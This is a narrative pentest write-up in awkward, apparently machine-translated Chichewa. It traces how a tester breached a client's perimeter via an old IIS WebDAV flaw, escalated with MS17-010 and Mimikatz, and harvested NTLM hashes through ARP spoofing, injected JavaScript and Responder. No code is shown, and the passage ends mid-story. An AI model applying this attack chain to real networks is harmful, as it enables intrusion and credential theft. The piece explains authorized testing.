Nkhaniyi idalembedwa kutengera pentest yopambana kwambiri yomwe akatswiri a Gulu-IB adachita zaka zingapo zapitazo: nkhani idachitika yomwe ingasinthidwe kukhala filimu ku Bollywood. Tsopano, mwina, kuyankha kwa owerenga kudzatsatira: "O, nkhani ina ya PR, izi zikuwonetsedwanso, momwe ziliri zabwino, musaiwale kugula pentest." Chabwino, mbali imodzi, izo ziri. Komabe, pali zifukwa zinanso zingapo zomwe zinapangitsa kuti nkhaniyi iwonekere. Ndinkafuna kuwonetsa zomwe ma pentesters amachita, momwe ntchitoyi ingakhalire yosangalatsa komanso yosakhala yaing'ono, ndi zochitika zotani zomwe zingabuke m'mapulojekiti, ndipo chofunika kwambiri, kusonyeza zinthu zomwe zili ndi zitsanzo zenizeni.
Kuti tibwezeretse kudzichepetsa padziko lapansi, patapita kanthawi tidzalemba za pentest yomwe sinayende bwino. Tidzawonetsa momwe njira zopangidwira bwino mu kampani zingatetezere ku ziwopsezo zambiri, ngakhale zokonzekera bwino, chifukwa chakuti njirazi zilipo ndipo zimagwiradi ntchito.
Kwa makasitomala m'nkhaniyi, zonse zinali zabwino kwambiri, osachepera 95% ya msika wa Russian Federation, malinga ndi momwe timamvera, koma panali zochepa zazing'ono zomwe zinapanga zochitika zambiri, zomwe poyamba zinali zochititsa chidwi. zinatsogolera ku lipoti lalitali la ntchitoyo , ndiyeno ku nkhaniyi.
Chifukwa chake, tiyeni tisunge ma popcorn, ndikulandilidwa kunkhani yofufuza. Mawu - Pavel Suprunyuk, manejala waukadaulo wa dipatimenti ya "Audit and Consulting" ya Gulu-IB.
Gawo 1. Pochkin dokotala
2018 Pali kasitomala - kampani yapamwamba ya IT, yomwe imatumikira makasitomala ambiri. Mukufuna kupeza yankho la funso: kodi ndizotheka, popanda chidziwitso choyambirira ndi mwayi, kugwira ntchito kudzera pa intaneti, kupeza ufulu wa Active Directory domain administrator? sindiri ndi chidwi ndi uinjiniya uliwonse wa anthu (), sakufuna kusokoneza ntchitoyo mwadala, koma akhoza mwangozi - kubwezeretsanso seva yodabwitsa yogwira ntchito, mwachitsanzo. Cholinga chowonjezera ndikuzindikira ma vector ena ambiri momwe angathere motsutsana ndi kuzungulira kwakunja. Kampaniyo nthawi zonse imayesa mayeso otere, ndipo tsopano tsiku lomaliza la mayeso atsopano lafika. Mikhalidwe ili pafupifupi yofanana, yokwanira, yomveka. Tiyeni tiyambe.
Pali dzina la kasitomala - likhale "Company", ndi tsamba lalikulu . Inde, kasitomala amatchedwa mosiyana, koma m'nkhaniyi zonse zidzakhala zopanda umunthu.
Ndimapanga chidziwitso cha maukonde - pezani ma adilesi ndi madambwe omwe amalembetsedwa ndi kasitomala, jambulani chithunzi cha netiweki, momwe mautumiki amagawidwira ku ma adilesi awa. Ndimapeza zotsatira zake: ma adilesi opitilira 4000 a IP amoyo. Ndimayang'ana madambwe mumanetiweki awa: mwamwayi, ambiri ndi ma network omwe amapangidwira makasitomala, ndipo sitikhala nawo chidwi. Wogula akuganiza chimodzimodzi.
Pali maukonde amodzi omwe ali ndi ma adilesi a 256, omwe pakadali pano pali kumvetsetsa kwagawika kwa madambwe ndi ma subdomain ndi ma adilesi a IP, pali zambiri zamadoko ojambulidwa, zomwe zikutanthauza kuti mutha kuyang'ana mautumikiwa omwe ali osangalatsa. Mofananamo, mitundu yonse ya scanner imayambitsidwa pama adilesi a IP omwe alipo komanso padera pamasamba.
Pali mautumiki ambiri. Kawirikawiri ichi ndi chisangalalo kwa pentester ndi kuyembekezera chigonjetso chofulumira, popeza mautumiki ambiri alipo, gawo lalikulu la kuukira ndi losavuta kupeza chojambula. Kuyang'ana mofulumira pa mawebusaitiwa kunasonyeza kuti ambiri mwa iwo ndi mawonekedwe a intaneti azinthu zodziwika bwino zamakampani akuluakulu apadziko lonse, omwe mwa maonekedwe onse amakuuzani kuti sakulandiridwa. Amafunsa dzina lolowera ndi mawu achinsinsi, gwedezani gawo lolowera chinthu chachiwiri, funsani satifiketi ya kasitomala ya TLS, kapena tumizani ku Microsoft ADFS. Zina sizipezeka pa intaneti. Kwa ena, mwachiwonekere muyenera kukhala ndi kasitomala wolipidwa wapadera pamalipiro atatu kapena kudziwa ma URL enieni kuti mulowe. Tiyeni tidumphe sabata lina la kukhumudwa pang'onopang'ono poyesa "kuphwanya" mitundu ya mapulogalamu azovuta zomwe zimadziwika, kufunafuna zobisika m'njira zapaintaneti ndi maakaunti odutsidwa kuchokera kumagulu ena ngati LinkedIn, kuyesa kuyerekeza mawu achinsinsi omwe akuwagwiritsa ntchito, komanso. monga kufukula zofooka m'mawebusayiti odzilemba okha - mwa njira, malinga ndi ziwerengero, iyi ndiye vector yodalirika kwambiri yowukira kunja lero. Nthawi yomweyo ndiwona mfuti ya kanema yomwe idawombera pambuyo pake.
Chifukwa chake, tapeza masamba awiri omwe adasiyana ndi mazana a mautumiki. Mawebusaitiwa anali ndi chinthu chimodzi chofanana: ngati simutenga nawo mbali pakuwunikira mosamala ma netiweki ndi madera, koma yang'anani kutsogolo kwa madoko otseguka kapena kuyang'ana pa scanner yomwe ili pachiwopsezo pogwiritsa ntchito mtundu wodziwika wa IP, ndiye kuti masambawa sangayang'anidwe ndipo sangakhalepo. zowoneka popanda kudziwa dzina la DNS. Mwina adaphonya kale, osachepera, ndipo zida zathu zodziwikiratu sizinapeze vuto lililonse ndi iwo, ngakhale zitatumizidwa mwachindunji kuzinthuzo.
Mwa njira, zomwe zidayambitsa makina ojambulira omwe adapezeka ambiri. Ndiroleni ndikukumbutseni: kwa anthu ena, "pentest" imafanana ndi "kujambula zokha". Koma makina ojambulira pulojekitiyi sananene chilichonse. Chabwino, kuchuluka kwake kunawonetsedwa ndi Zowopsa Zapakatikati (3 mwa 5 potengera kuuma kwake): pa ntchito zina satifiketi yoyipa ya TLS kapena ma aligorivimu akale achinsinsi, komanso pamasamba ambiri Clickjacking. Koma izi sizingakufikitseni ku cholinga chanu. Mwina ma scanner angakhale othandiza kwambiri pano, koma ndikukumbutseni: kasitomala mwiniwake amatha kugula mapulogalamuwa ndikudziyesa nawo, ndipo, poyang'ana zotsatira zake zoipa, adayang'ana kale.
Tiyeni tibwerere kumasamba "odabwitsa". Yoyamba ndi china chake ngati Wiki wamba pa adilesi yosagwirizana, koma m'nkhaniyi ikhale wiki.company[.]ru. Anapemphanso nthawi yomweyo lolowera ndi mawu achinsinsi, koma kudzera NTLM mu msakatuli. Kwa wogwiritsa ntchito, izi zikuwoneka ngati zenera la ascetic kufunsa kuti alembe dzina lolowera ndi mawu achinsinsi. Ndipo ichi ndi chizolowezi choipa.
Cholemba chaching'ono. NTLM m'mawebusayiti ozungulira ndiyoyipa pazifukwa zingapo. Chifukwa choyamba ndikuti Active Directory domain name imawululidwa. Mu chitsanzo chathu, idakhalanso company.ru, monga dzina la "kunja" la DNS. Podziwa izi, mutha kukonzekera mosamala chinthu choyipa kuti chizichitika pamakina a bungwe, osati mu sandbox. Kachiwiri, kutsimikizika kumadutsa mwachindunji kudzera mwa woyang'anira dera kudzera pa NTLM (zodabwitsa, sichoncho?), Ndizinthu zonse za ndondomeko za "internal" network, kuphatikizapo kuletsa ma akaunti kuti asapitirire chiwerengero cha kuyesa kulowa mawu achinsinsi. Ngati wowukirayo apeza zolowera, amayesa mawu achinsinsi kwa iwo. Ngati mwakonzedwa kuti mulepheretse maakaunti kuti asalowe mawu achinsinsi olakwika, zimagwira ntchito ndipo akauntiyo idzatsekedwa. Chachitatu, nβkosatheka kuwonjezera chinthu chachiΕ΅iri ku chitsimikiziro choterocho. Ngati aliyense wa owerenga akudziwabe, chonde ndidziwitseni, ndizosangalatsa kwambiri. Chachinayi, kukhala pachiwopsezo chodutsa-the-hash. ADFS idapangidwa, mwa zina, kuti iteteze ku zonsezi.
Pali chinthu chimodzi choipa cha zinthu za Microsoft: ngakhale simunasindikize NTLM yotereyi, idzakhazikitsidwa mwachisawawa mu OWA ndi Lync, osachepera.
Mwa njira, wolemba nkhaniyi nthawi ina adatseka mwangozi maakaunti pafupifupi 1000 a ogwira ntchito ku banki imodzi yayikulu mu ola limodzi pogwiritsa ntchito njira yomweyi kenako adawoneka ngati wotumbululuka. Ntchito za IT za banki zinalinso zotumbululuka, koma zonse zidatha bwino komanso moyenera, tidatamandidwa chifukwa chokhala oyamba kupeza vutoli ndikuyambitsa kukonza mwachangu komanso motsimikizika.
Tsamba lachiwiri linali ndi adilesi "mwachiwonekere mtundu wina wa dzina lomaliza.company.ru." Ndinazipeza kudzera pa Google, monga chonchi patsamba 10. Kapangidwe kameneka kanachokera koyambirira kwa zaka za m'ma XNUMX, ndipo munthu wolemekezeka amaziyang'ana kuchokera patsamba lalikulu, monga chonchi:
Apa ndinatengabe kuchokera ku "Mtima wa Galu", koma ndikhulupirireni, zinali zofanana momveka bwino, ngakhale mapangidwe amtundu anali ofanana. Lolani tsambalo litchulidwe preobrazhensky.company.ru.
Inali tsamba laumwini ... la urologist. Ndidadabwa kuti tsamba la urologist likuchita chiyani pakampani inayake yapamwamba kwambiri. Kufufuza mwachangu mu Google kunawonetsa kuti dotoloyu anali woyambitsa m'modzi mwa mabungwe ovomerezeka a kasitomala athu ndipo adaperekanso pafupifupi ma ruble a 1000 ku likulu lovomerezeka. Tsambali mwina lidapangidwa zaka zambiri zapitazo, ndipo zida za seva za kasitomala zidagwiritsidwa ntchito ngati kuchititsa. Tsambali lataya kufunikira kwake, koma pazifukwa zina idasiyidwa ikugwira ntchito kwa nthawi yayitali.
Ponena za zofooka, tsambalo linali lotetezeka. Kuyang'ana m'tsogolo, ndikunena kuti inali chidziwitso chokhazikika - masamba osavuta a html okhala ndi mafanizo oyikapo ngati impso ndi chikhodzodzo. Palibe ntchito "kuswa" malo oterowo.
Koma seva yapaintaneti yomwe ili pansipa inali yosangalatsa kwambiri. Kutengera mutu wa HTTP Server, inali ndi IIS 6.0, zomwe zikutanthauza kuti idagwiritsidwa ntchito Windows 2003 ngati makina ogwiritsira ntchito. Sikinayi idazindikira kale kuti tsamba la urologist ili, mosiyana ndi ena omwe ali pa seva yomweyo, adayankha lamulo la PROPFIND, kutanthauza kuti likuyendetsa WebDAV. Mwa njira, sikaniyo idabweza chidziwitsochi ndi chizindikiro cha Info (m'chilankhulo cha malipoti a scanner, ndiye ngozi yotsika kwambiri) - zinthu zotere nthawi zambiri zimangodumphidwa. Kuphatikiza, izi zidapereka chidwi, chomwe chidawululidwa pokhapokha kukumba kwina pa Google: chiwopsezo chosowa cholumikizira cholumikizidwa ndi seti ya Shadow Brokers, yomwe ndi CVE-2017-7269, yomwe idachita kale kale. Mwanjira ina, padzakhala vuto ngati muli ndi Windows 2003 ndipo WebDAV ikuyenda pa IIS. Ngakhale kuthamanga Windows 2003 pakupanga mu 2018 ndi vuto palokha.
Kuchitapo kanthu kunathera ku Metasploit ndipo adayesedwa nthawi yomweyo ndi katundu yemwe adatumiza pempho la DNS ku ntchito yolamulidwa - Burp Collaborator nthawi zambiri amagwiritsidwa ntchito kugwira zopempha za DNS. Chodabwitsa changa, chinagwira ntchito nthawi yoyamba: kugogoda kwa DNS kunalandiridwa. Kenako, panali kuyesa kupanga cholumikizira kudzera pa doko 80 (ndiko kuti, kulumikizana kwa netiweki kuchokera pa seva kupita kwa wowukira, ndi mwayi wa cmd.exe pa wozunzidwayo), koma fiasco inachitika. Kulumikizana sikunabwere, ndipo pambuyo poyesa kachitatu kugwiritsa ntchito malowa, pamodzi ndi zithunzi zonse zosangalatsa, zinasowa kwamuyaya.
Nthawi zambiri izi zimatsatiridwa ndi chilembo chamtundu wa "kasitomala, dzukani, tasiya chilichonse." Koma tinauzidwa kuti malowa alibe chochita ndi ndondomeko zamalonda ndipo amagwira ntchito kumeneko popanda chifukwa, monga seva yonse, komanso kuti tikhoza kugwiritsa ntchito chida ichi momwe tikufunira.
Pafupifupi tsiku limodzi pambuyo pake tsambalo mwadzidzidzi linayamba kugwira ntchito palokha. Nditamanga benchi kuchokera ku WebDAV pa IIS 6.0, ndapeza kuti zosintha ndikuyambitsanso machitidwe a IIS maola 30 aliwonse. Ndiko kuti, pamene ulamuliro unatuluka mu shellcode, ndondomeko ya ogwira ntchito ya IIS inatha, kenako inayambiranso kangapo ndikupumula kwa maola 30.
Popeza backconnect to tcp inalephera nthawi yoyamba, ndinanena kuti vutoli ndi doko lotsekedwa. Ndiko kuti, adaganiza kukhalapo kwa mtundu wina wa firewall womwe sunalole kuti maulumikizidwe otuluka adutse panja. Ndinayamba kuyendetsa ma shellcode omwe amafufuza madoko ambiri a tcp ndi udp, panalibe zotsatira. Malumikizidwe obwerera kumbuyo kudzera pa ma http kuchokera ku Metasploit sanagwire ntchito - meterpreter/reverse_http(s). Mwadzidzidzi, kugwirizana kwa doko lomwelo 80 kunakhazikitsidwa, koma nthawi yomweyo kunagwa. Ndidanena kuti izi zidachitika ndi IPS yongoganizirabe, yomwe sinkakonda kuchuluka kwa ma meterpreter. Poganizira kuti kulumikizana koyera kwa tcp ku port 80 sikunadutse, koma kulumikizana kwa http kunatero, ndinatsimikiza kuti proxy http idakonzedwa mwanjira ina.
Ndidayesanso meterpreter kudzera pa DNS (zikomo chifukwa cha zoyesayesa zanu, ndapulumutsa mapulojekiti ambiri), pokumbukira kupambana koyamba, koma sikunagwire ntchito poyimilira - chipolopolocho chinali chochepa kwambiri chifukwa cha chiwopsezo ichi.
M'malo mwake, zikuwoneka ngati izi: 3-4 kuyesa kuukira mkati mwa mphindi 5, ndikudikirira maola 30. Ndi zina zotero kwa milungu itatu motsatizana. Ndinakhazikitsanso chikumbutso kuti ndisataye nthawi. Kuonjezera apo, panali kusiyana kwa khalidwe la malo oyesera ndi kupanga: pachiopsezo ichi panali zochitika ziwiri zofanana, imodzi kuchokera ku Metasploit, yachiwiri kuchokera pa intaneti, yosinthidwa kuchokera ku Shadow Brokers version. Chifukwa chake, Metasploit yokhayo idayesedwa pomenya nkhondo, ndipo yachiwiri yokha idayesedwa pa benchi, zomwe zidapangitsa kuti zovuta zikhale zovuta kwambiri ndipo zidasokoneza ubongo.
Pamapeto pake, chipolopolo chomwe chinatsitsa fayilo ya exe kuchokera pa seva yopatsidwa kudzera pa http ndikuyiyambitsa pa dongosolo lachindunji chinakhala chothandiza. Chipolopolocho chinali chaching'ono chokwanira, koma chinagwira ntchito. Popeza seva sinakonde kuchuluka kwa TCP konse ndipo ma http (ma) adayang'aniridwa kuti apeze meterpreter, ndinaganiza kuti njira yofulumira kwambiri ndikutsitsa fayilo ya exe yomwe ili ndi DNS-meterpreter kudzera mu shellcode iyi.
Apanso vuto lidayamba: potsitsa fayilo ya exe ndipo, monga zoyeserera, zivute zitani, kutsitsa kudasokonekera. Apanso, chipangizo china chachitetezo pakati pa seva yanga ndi urologist sichinakonde traffic ya http ndi exe mkati. Yankho la "mwamsanga" likuwoneka kuti likusintha chipolopolocho kuti chisokoneze http traffic pa ntchentche, kuti deta yosadziwika bwino isamutsidwe m'malo mwa exe. Pomaliza, kuwukirako kudayenda bwino, kuwongolera kudalandiridwa kudzera panjira yopyapyala ya DNS:
Nthawi yomweyo zidadziwika kuti ndili ndi ufulu woyambira wa IIS, womwe umandilola kuti ndisachite kalikonse. Izi ndi zomwe zinkawoneka pa Metasploit console:
Njira zonse za pentest zimatsimikizira kuti muyenera kuwonjezera ufulu mukapeza mwayi. Nthawi zambiri sindimachita izi kwanuko, chifukwa kulowa koyamba kumangowoneka ngati malo olowera pamaneti, ndipo kusokoneza makina ena pamaneti omwewo nthawi zambiri kumakhala kosavuta komanso mwachangu kuposa kuchulukira mwayi kwa omwe alipo. Koma izi sizili choncho pano, popeza njira ya DNS ndi yopapatiza kwambiri ndipo sizingalole kuti magalimoto aziyenda.
Pongoganiza kuti izi Windows 2003 seva sinakonzedwenso chifukwa cha chiopsezo chodziwika bwino cha MS17-010, ndimayendetsa magalimoto kupita ku doko 445/TCP kudzera mumsewu wa meterpreter DNS kupita ku localhost (inde, izi ndizotheka) ndikuyesa kuyendetsa exe yomwe idatsitsidwa kale. kusatetezeka. Kuwukira kumagwira ntchito, ndimalandira kulumikizidwa kwachiwiri, koma ndi ufulu wa SYSTEM.
Ndizosangalatsa kuti adayesetsabe kuteteza seva ku MS17-010 - inali ndi maukonde osatetezeka omwe adayimitsidwa pa mawonekedwe akunja. Izi zimateteza pakuwukiridwa pamaneti, koma kuwukira kochokera mkati mwa localhost kunagwira ntchito, popeza simungathe kuzimitsa mwachangu SMB pa localhost.
Kenako, zatsopano zosangalatsa zikuwululidwa:
- Pokhala ndi maufulu a SYSTEM, mutha kukhazikitsa mosavuta kulumikizana kudzera pa TCP. Zachidziwikire, kuletsa mwachindunji TCP ndivuto kwa ogwiritsa ntchito ochepa a IIS. Spoiler: kuchuluka kwa ogwiritsa ntchito a IIS kudakulungidwa mwanjira ya ISA Proxy mbali zonse ziwiri. Momwe zimagwirira ntchito, sindinapangenso.
- Ndili mu "DMZ" ina (ndipo iyi si Active Directory domain, koma WORKGROUP) - zikumveka zomveka. Koma m'malo mwa adilesi ya IP yachinsinsi ("imvi") yomwe ikuyembekezeka, ndili ndi adilesi ya IP "yoyera", yofanana ndendende ndi yomwe ndidaukira kale. Izi zikutanthauza kuti kampaniyo ndi yakale kwambiri padziko lonse lapansi ya IPv4 adilesi kotero kuti imatha kusunga chigawo cha DMZ cha ma adilesi "oyera" 128 popanda NAT molingana ndi dongosololi, monga akuwonetsera m'mabuku a Cisco kuyambira 2005.
Popeza seva ndi yakale, Mimikatz akutsimikiziridwa kuti azigwira ntchito mwachindunji kuchokera pamtima:
Ndimalandira mawu achinsinsi a woyang'anira kwanuko, mayendedwe a RDP pa TCP ndikulowa pakompyuta yabwino. Popeza ndimatha kuchita chilichonse chomwe ndimafuna ndi seva, ndidachotsa antivayirasi ndikupeza kuti sevayo idapezeka pa intaneti kokha kudzera pa madoko a TCP 80 ndi 443, ndipo 443 sinali otanganidwa. Ndidakhazikitsa seva ya OpenVPN pa 443, yonjezerani ntchito za NAT pamayendedwe anga a VPN ndikupeza mwayi wolunjika ku netiweki ya DMZ munjira yopanda malire kudzera pa OpenVPN yanga. Ndizochititsa chidwi kuti ISA, pokhala ndi ntchito zina za IPS zomwe sizinalephereke, zinatsekereza magalimoto anga ndi kusanthula doko, zomwe zinayenera kusinthidwa ndi RRAS yosavuta komanso yovomerezeka. Chifukwa chake, ma pentesters nthawi zina amafunikirabe kuyang'anira mitundu yonse ya zinthu.
Wowerenga mwachidwi adzafunsa kuti: "Nanga bwanji tsamba lachiwiri - wiki yokhala ndi kutsimikizika kwa NTLM, zomwe zalembedwa zambiri?" Zambiri pa izi pambuyo pake.
Gawo 2. Simunalembebe? Ndiye tikubwera kwa inu kale pano
Chifukwa chake, pali mwayi wopeza gawo la netiweki ya DMZ. Muyenera kupita ku domain administrator. Chinthu choyamba chomwe chimabwera m'maganizo ndikungoyang'ana chitetezo cha ntchito mkati mwa gawo la DMZ, makamaka popeza ambiri aiwo atsegulidwa kuti afufuzidwe. Chithunzi chofananira pakuyesa kulowa: gawo lakunja limatetezedwa bwino kuposa ntchito zamkati, ndipo mukapeza mwayi uliwonse mkati mwachitukuko chachikulu, ndikosavuta kupeza ufulu wokulirapo muderali chifukwa chakuti domain iyi imayamba kukhala. kupezeka ndi zida, ndipo kachiwiri, Mu zomangamanga zomwe zili ndi makamu zikwi zingapo, padzakhala zovuta zingapo nthawi zonse.
Ndimalipira ma scanner kudzera pa DMZ kudzera panjira ya OpenVPN ndikudikirira. Nditsegula lipoti - kachiwiri palibe choopsa, mwachiwonekere wina adadutsa njira yomweyo pamaso panga. Chotsatira ndikuwunika momwe omwe ali mu netiweki ya DMZ amalankhulirana. Kuti muchite izi, yambitsani Wireshark wamba ndikumvera zopempha zowulutsa, makamaka ARP. Mapaketi a ARP adasonkhanitsidwa tsiku lonse. Zikuoneka kuti zipata zingapo zimagwiritsidwa ntchito mu gawo ili. Izi zidzathandiza pambuyo pake. Mwa kuphatikiza deta pa zopempha za ARP ndi mayankho ndi deta yoyang'ana padoko, ndinapeza malo otuluka a anthu omwe ali mkati mwa netiweki yapafupi kuwonjezera pa mautumiki omwe kale ankadziwika, monga intaneti ndi makalata.
Popeza panthawiyo ndinalibe mwayi wogwiritsa ntchito machitidwe ena ndipo ndinalibe akaunti imodzi yochitira ntchito zamagulu, ndinaganiza zosodza akaunti ina kuchokera ku magalimoto pogwiritsa ntchito ARP Spoofing.
Kaini & Abele adakhazikitsidwa pa seva ya urologist. Poganizira zakuyenda kwa magalimoto odziwika, awiriawiri odalirika kwambiri pakuwukira kwapakatikati adasankhidwa, ndiyeno magalimoto ena apaintaneti adalandiridwa ndikukhazikitsa kwakanthawi kwa mphindi 5-10, ndi chowerengera kuti muyambitsenso seva. ngati kuzizira. Monga nthabwala, panali nkhani ziwiri:
- Zabwino: zidziwitso zambiri zidagwidwa ndipo kuwukira konseko kunagwira ntchito.
- Zoyipa: zidziwitso zonse zidachokera kwa kasitomala omwe. Pomwe akupereka chithandizo, akatswiri amakasitomala amalumikizana ndi makasitomala omwe sanakhazikitsidwe nthawi zonse.
Chotsatira chake, ndinapeza zidziwitso zambiri zomwe zinali zopanda ntchito pazochitika za polojekitiyi, koma ndithudi zosangalatsa monga chiwonetsero cha kuopsa kwa chiwonongeko. Ma routers a m'malire amakampani akuluakulu okhala ndi telnet, amatumiza madoko a http ku CRM yamkati ndi data yonse, mwayi wolunjika ku RDP kuchokera ku Windows XP pa netiweki yakomweko ndi zovuta zina. Zinakhala chonchi .
Ndinapezanso mpata woseketsa wotolera makalata a magalimoto, monga chonchi. Ichi ndi chitsanzo cha kalata yokonzekera yomwe inachokera kwa kasitomala wathu kupita ku doko la SMTP la kasitomala wake, kachiwiri, popanda kubisa. Andrey wina amamufunsa dzina lake kuti atumizenso zolembazo, ndipo zimakwezedwa pamtambo wamtambo wokhala ndi malowedwe, mawu achinsinsi ndi ulalo mukalata imodzi yoyankha:
Ichi ndi chikumbutso chinanso cholembera mautumiki onse. Sizikudziwika kuti ndani ndi liti adzawerenga ndikugwiritsa ntchito deta yanu makamaka - wothandizira, woyang'anira dongosolo la kampani ina, kapena pentester wotere. Sindinatchulepo kuti anthu ambiri amatha kusokoneza magalimoto osadziwika.
Ngakhale zinali zowoneka bwino, izi sizinatifikitse pafupi ndi cholingacho. Zinali zotheka, ndithudi, kukhala kwa nthawi yaitali ndikusodza zambiri zamtengo wapatali, koma sizowona kuti zidzawonekera pamenepo, ndipo kuukira komweko kumakhala koopsa kwambiri ponena za kukhulupirika kwa intaneti.
Pambuyo pokumba kwina mu mautumiki, lingaliro losangalatsa linabwera m'maganizo. Pali zida zotere zotchedwa Responder (ndizosavuta kupeza zitsanzo zogwiritsiridwa ntchito ndi dzinali), zomwe, mwa "poizoni" zopempha zowulutsa, zimayambitsa kulumikizana kudzera pama protocol osiyanasiyana monga SMB, HTTP, LDAP, ndi zina zambiri. m'njira zosiyanasiyana, ndiye amafunsa aliyense amene zilumikizidwe kutsimikizira ndi kuziyika izo kuti kutsimikizika kumachitika kudzera NTLM ndi mumalowedwe mandala kwa wozunzidwayo. Nthawi zambiri, wowukira amatenga kugwirana chanza kwa NetNTLMv2 motere ndipo kuchokera kwa iwo, pogwiritsa ntchito dikishonale, amapezanso mawu achinsinsi a wosuta. Apa ndimafuna zofanana, koma ogwiritsa ntchito "kumbuyo kwa khoma", kapena m'malo mwake, adalekanitsidwa ndi chowotcha moto, ndikufikira pa WEB kudzera pagulu la proxy Blue Coat.
Kumbukirani, ndidatchula kuti Active Directory domain name idagwirizana ndi "kunja" domain, ndiko kuti, inali company.ru? Chifukwa chake, Windows, ndendende Internet Explorer (ndi Edge ndi Chrome), imalola wogwiritsa ntchito kutsimikizira momveka bwino mu HTTP kudzera pa NTLM ngati akuwona kuti tsambalo lili mu "Intranet Zone". Chimodzi mwa zizindikiro za "Intranet" ndi mwayi wopeza adilesi ya IP ya "grey" kapena dzina lalifupi la DNS, ndiko kuti, opanda madontho. Popeza anali ndi seva yokhala ndi IP "yoyera" ndi dzina la DNS preobrazhensky.company.ru, ndipo makina amadomeni nthawi zambiri amalandira chidziwitso cha Active Directory domain kudzera pa DHCP kuti alowetse dzina losavuta, amangoyenera kulemba ulalo mu bar ya adilesi. , kotero kuti apeze njira yoyenera yopita ku seva yowonongeka ya urologist, osaiwala kuti izi tsopano zimatchedwa "Intranet". Ndiko kuti, nthawi yomweyo kundipatsa NTLM-chanza cha wosuta popanda kudziwa kwake. Zomwe zatsala ndikukakamiza asakatuli a kasitomala kuti aganizire zakufunika kolumikizana ndi seva iyi.
Ntchito yodabwitsa ya Intercepter-NG idabwera kudzapulumutsa (zikomo ). Zinakulolani kuti musinthe magalimoto pa ntchentche ndikugwira ntchito bwino pa Windows 2003. Idakhalanso ndi ntchito zosiyana zosinthira mafayilo a JavaScript okha pamagalimoto. Mtundu waukulu wa Cross-Site Scripting unakonzedwa.
Ma proxies a Blue Coat, omwe ogwiritsa ntchito amafikira pa WEB yapadziko lonse, nthawi ndi nthawi amasunga zomwe zili zokhazikika. Poletsa kuchuluka kwa magalimoto, zinali zoonekeratu kuti anali kugwira ntchito usana ndi usiku, kupempha kosalekeza kosasunthika komwe amagwiritsidwa ntchito mobwerezabwereza kuti afulumizitse kuwonetsa zomwe zili mkati mwa maola apamwamba. Kuphatikiza apo, BlueCoat inali ndi Wothandizira-Wothandizira, yemwe adasiyanitsa momveka bwino ndi wogwiritsa ntchito weniweni.
Javascript idakonzedwa, yomwe, pogwiritsa ntchito Intercepter-NG, idakhazikitsidwa kwa ola limodzi usiku pakuyankha kulikonse ndi mafayilo a JS a Blue Coat. Script idachita izi:
- Kusankha msakatuli wapano ndi User-Agent. Ngati inali Internet Explorer, Edge kapena Chrome, idapitilira kugwira ntchito.
- Ndinadikirira mpaka DOM ya tsambalo idapangidwa.
- Anaika chithunzi chosaoneka mu DOM ndi mawonekedwe a src a mawonekedwe :8080/NNNNNNN.png, pomwe NNN ndi manambala osasinthasintha kotero kuti BlueCoat isazisungire.
- Khazikitsani kusinthika kwa mbendera yapadziko lonse lapansi kuwonetsa kuti jekeseniyo idamalizidwa ndipo palibenso chifukwa choyika zithunzi.
Msakatuli adayesa kutsitsa chithunzichi; pa doko 8080 la seva yowonongeka, njira ya TCP inali kuyembekezera pa laputopu yanga, pomwe Woyankha yemweyo anali kuthamanga, kumafuna kuti msakatuli alowe kudzera pa NTLM.
Poyang'ana zipika za Responder, anthu adabwera kudzagwira ntchito m'mawa, adatsegula malo awo ogwirira ntchito, ndiyeno ambiri ndipo osadziwika anayamba kuyendera seva ya urologist, osaiwala "kukhetsa" manja a NTLM. Kugwirana chanza kunagwa tsiku lonse ndikusonkhanitsa zinthu zomveka bwino kuti zitheke bwino kuti mubwezeretse mawu achinsinsi. Izi ndi zomwe ma Responder logs amawonekera:
Kuyendera kwachinsinsi kwa seva ya urologist ndi ogwiritsa ntchito
Mwinamwake mwawona kale kuti nkhani yonseyi imamangidwa pa mfundo yakuti "zonse zinali bwino, koma panali phokoso, ndiye panali kugonjetsa, ndiyeno zonse zinayenda bwino." Kotero, panali phokoso apa. Pakugwirana chanza kwapaderako makumi asanu, palibe ngakhale imodzi yomwe idawululidwa. Ndipo izi zimaganiziranso kuti ngakhale pa laputopu yokhala ndi purosesa yakufa, kugwirana chanza kwa NTLMv2 kumakonzedwa pa liwiro la kuyesa mamiliyoni mazana angapo pamphindikati.
Ndinayenera kudzipangira njira zosinthira mawu achinsinsi, khadi ya kanema, dikishonale yokulirapo ndikudikirira. Patapita nthawi yaitali, ma akaunti angapo okhala ndi mawu achinsinsi a mawonekedwe a "Q11111111 .... 1111111q" adawululidwa, zomwe zikusonyeza kuti ogwiritsa ntchito onse nthawi ina anakakamizika kubwera ndi mawu achinsinsi aatali kwambiri omwe ali ndi zilembo zosiyana, zomwe zimayenera kutero. kukhala zovuta. Koma simungapusitse wogwiritsa ntchito wokhazikika, ndipo umu ndi momwe adathandizira kuti azikumbukira mosavuta. Ponseponse, pafupifupi maakaunti a 5 adasokonezedwa, ndipo m'modzi yekha wa iwo anali ndi ufulu wofunikira pazithandizozi.
Gawo 3. Roskomnadzor akumenya kumbuyo
Chifukwa chake, maakaunti oyambira adalandiridwa. Ngati simunagone pofika nthawiyi powerenga kwanthawi yayitali, mwina mudzakumbukira kuti ndidatchulapo ntchito yomwe sinafune chinthu chachiwiri chotsimikizika: ndi wiki yokhala ndi kutsimikizika kwa NTLM. Inde, chinthu choyamba kuchita chinali kulowa mmenemo. Kukumba mu chidziwitso chamkati kunabweretsa zotsatira mwachangu:
- Kampaniyo ili ndi netiweki ya WiFi yokhala ndi chitsimikiziro pogwiritsa ntchito maakaunti amtundu wokhala ndi netiweki yakomweko. Ndi seti yamakono ya deta, iyi ndi vekitala yogwira ntchito kale, koma muyenera kupita ku ofesi ndi mapazi anu ndikukhala penapake pagawo la ofesi ya kasitomala.
- Ndidapeza malangizo molingana ndi momwe panali ntchito yomwe idalola ... kulembetsa paokha chida chotsimikizika cha "second factor" ngati wogwiritsa ali mkati mwa netiweki yakomweko ndikukumbukira molimba mtima malowedwe ake ndi mawu achinsinsi. Pankhaniyi, "mkati" ndi "kunja" zinatsimikiziridwa ndi kupezeka kwa doko la ntchitoyi kwa wogwiritsa ntchito. Doko silinkapezeka pa intaneti, koma linkapezeka kudzera mu DMZ.
